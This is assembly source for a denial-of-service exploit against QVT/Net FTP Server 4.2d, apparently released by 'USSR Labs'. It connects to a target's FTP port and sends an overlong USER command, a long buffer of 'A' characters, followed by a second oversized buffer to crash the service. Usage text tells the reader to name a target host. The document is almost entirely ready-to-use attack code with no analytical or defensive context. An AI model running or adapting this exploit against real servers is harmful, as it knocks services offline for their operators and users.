;============================================================================ ; This is the source code for QVT/Net FTP Server version 4.2d win98/NT == ; == ; Source by: USSR Labs == ; www.ussrback.com == ; == ;============================================================================ .386p locals jumps .model flat, stdcall extrn GetCommandLineA:PROC extrn GetStdHandle:PROC extrn WriteConsoleA:PROC extrn ExitProcess:PROC extrn WSAStartup:PROC extrn connect:PROC extrn send:PROC extrn recv:PROC extrn WSACleanup:PROC extrn htons:PROC extrn socket:PROC extrn inet_addr:PROC extrn closesocket:PROC Extrn GetModuleHandleA : PROC Extrn GetProcAddress : PROC Extrn lstrlenA : PROC .data sploit_code label byte DB 'USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',13,10 sploit_code_length equ $-sploit_code sploit_code2 label byte DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',13,10 sploit2_code_length equ $-sploit_code2 Copy db "QVT/Net FTP Server version 4.2d Win98/NT Denial of Service", 13, 10 db "by: Ussr",13,10 db "for source code or binary go to: http://www.ussrback.com/qvtfs42/",13,10,13,10 db "Usage: dieqvtftp HostIp", 13, 10 db "Example: dieqvtftp 205.488.47.6",13,10,0 Copyl equ $-Copy wsadescription_len equ 256 wsasys_status_len equ 128 WSAdata struct wVersion dw ? wHighVersion dw ? szDescription db wsadescription_len+1 dup (?) szSystemStatus db wsasys_status_len+1 dup (?) iMaxSockets dw ? iMaxUdpDg dw ? lpVendorInfo dw ? WSAdata ends sockaddr_in struct sin_family dw ? sin_port dw ? sin_addr dd ? sin_zero db 8 dup (0) sockaddr_in ends wsadata WSAdata sin sockaddr_in sock dd ? numbase dd 10 hostParamether db 256 dup (?) buffer dd 1000 dup (0) buffer2 dd 1000 dup (0) buffer3 dd 1000 dup (0) i_cant_connect db 'fata: sorry i can',27h,'t connect to this host!',13,10 i_cant_connectl equ $-i_cant_connect SendingExploit db 'Sending D.O.S code....',13,10 SendingExploitl equ $-SendingExploit include code.inc cchWritten dd 0 ConHandle dd 0 .code start: xor eax,eax xor ebx,ebx xor edx,edx xor ecx,ecx xor esi,esi xor edi,edi xor ebp,ebp Push -11 Call GetStdHandle Mov [ConHandle],EAX call GetCommandLineA mov edi, eax mov ecx, -1 xor al, al push edi repnz scasb not ecx pop edi mov al, 20h repnz scasb dec ecx mov esi, edi cmp byte ptr [esi],0 je no_command_line cmp byte ptr [esi],20 je incrementa1 continue: lea edi, hostParamether rep movsb push offset wsadata push 0101h call WSAStartup xor eax, eax push eax inc eax push eax inc eax push eax call socket mov sock, eax mov sin.sin_family, 2 mov eax,21d ; port push eax call htons mov sin.sin_port, ax push offset hostParamether call inet_addr mov sin.sin_addr, eax push size sin push offset sin push sock call connect or eax, eax jz connectionworking Write_Console jmp the_end incrementa1: inc si jmp continue connectionworking: xor eax, eax push eax push 1000 push offset buffer push sock call recv push offset buffer call lstrlenA Write_Console Write_Console call lstrlenA xor eax, eax push eax push sploit_code_length push offset sploit_code push sock call send xor eax, eax push eax push 1000 push offset buffer2 push sock call recv push offset buffer2 call lstrlenA Write_Console xor eax, eax push eax push sploit2_code_length push offset sploit_code2 push sock call send Write_Console push sock call closesocket call WSACleanup push offset wsadata push 0101h call WSAStartup xor eax, eax push eax inc eax push eax inc eax push eax call socket mov sock, eax mov sin.sin_family, 2 mov eax,21d ; port push eax call htons mov sin.sin_port, ax push offset hostParamether call inet_addr push size sin push offset sin push sock call connect the_end: push sock call closesocket call WSACleanup final_exit: push 0 call ExitProcess no_command_line: Write_Console jmp final_exit end start